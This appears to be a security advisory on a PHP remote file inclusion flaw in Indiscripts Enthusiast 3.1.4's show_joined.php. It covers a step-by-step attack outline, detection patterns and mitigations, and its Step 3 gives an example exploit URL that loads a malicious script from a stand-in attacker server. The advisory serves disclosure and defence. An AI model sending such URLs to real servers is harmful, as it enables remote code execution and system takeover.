Source: cve@mitre.org
PHP remote file inclusion vulnerability in show_joined.php in Indiscripts Enthusiast 3.1.4, and possibly earlier, allows remote attackers to execute arbitrary PHP code via a URL in the path parameter. NOTE: the researcher also points out the analogous directory traversal issue.
Indiscripts Enthusiast 3.1.4 and potentially earlier versions are vulnerable to a remote file inclusion (RFI) attack, allowing attackers to execute arbitrary code on the server. This vulnerability, triggered by improper input validation in show_joined.php, grants attackers complete control over the compromised system, leading to data breaches and system compromise.
Step 1: Identify Vulnerable Target: The attacker identifies a web server running Indiscripts Enthusiast 3.1.4 or earlier.
Step 2: Craft Malicious Payload: The attacker creates a malicious PHP script (e.g., a web shell) hosted on a server they control.
Step 3: Construct Exploit URL: The attacker crafts a URL that exploits the RFI vulnerability in show_joined.php. The URL includes the path parameter, pointing to the attacker's malicious script. For example: http://vulnerable-server/show_joined.php?path=http://attacker-server/malicious.php
Step 4: Exploit Execution: The attacker sends the crafted URL to the vulnerable server.
Step 5: Code Execution: The show_joined.php script, due to the lack of input validation, includes the attacker's malicious PHP script from the specified URL.
Step 6: System Compromise: The attacker's malicious script executes on the server, granting them control over the system, potentially including the ability to read sensitive data, modify files, or execute further commands.
The vulnerability stems from a lack of input validation on the path parameter within the show_joined.php script. The script directly includes the file specified by the path parameter without proper sanitization or filtering. This allows an attacker to inject a URL pointing to a malicious PHP script hosted on a remote server. The script then executes the attacker-controlled code, leading to arbitrary code execution. The analogous directory traversal issue allows an attacker to potentially read sensitive files on the server.
While no specific APTs are definitively linked to this CVE, the nature of RFI vulnerabilities makes them attractive to a wide range of attackers, from script kiddies to more sophisticated actors. This vulnerability is not listed on the CISA KEV at the time of this report, but it is a high-severity vulnerability that could be used by any actor.
Monitor web server access logs for suspicious requests to show_joined.php with the path parameter containing external URLs.
Analyze network traffic for HTTP requests containing the pattern show_joined.php?path=http:// or similar patterns.
Implement file integrity monitoring to detect changes to critical system files.
Use a web application firewall (WAF) to block requests containing malicious payloads or suspicious patterns.
Monitor for unusual PHP processes or shell executions on the server.
Upgrade to a patched version of Indiscripts Enthusiast or a version that is no longer vulnerable.
Implement input validation and sanitization on the path parameter in show_joined.php to ensure that only local files are included and that the input is properly escaped.
Disable the allow_url_fopen directive in the php.ini configuration file to prevent remote file inclusion.
Use a web application firewall (WAF) to filter malicious requests.
Regularly scan the system for vulnerabilities.
Implement a defense-in-depth strategy, including least privilege access and regular security audits.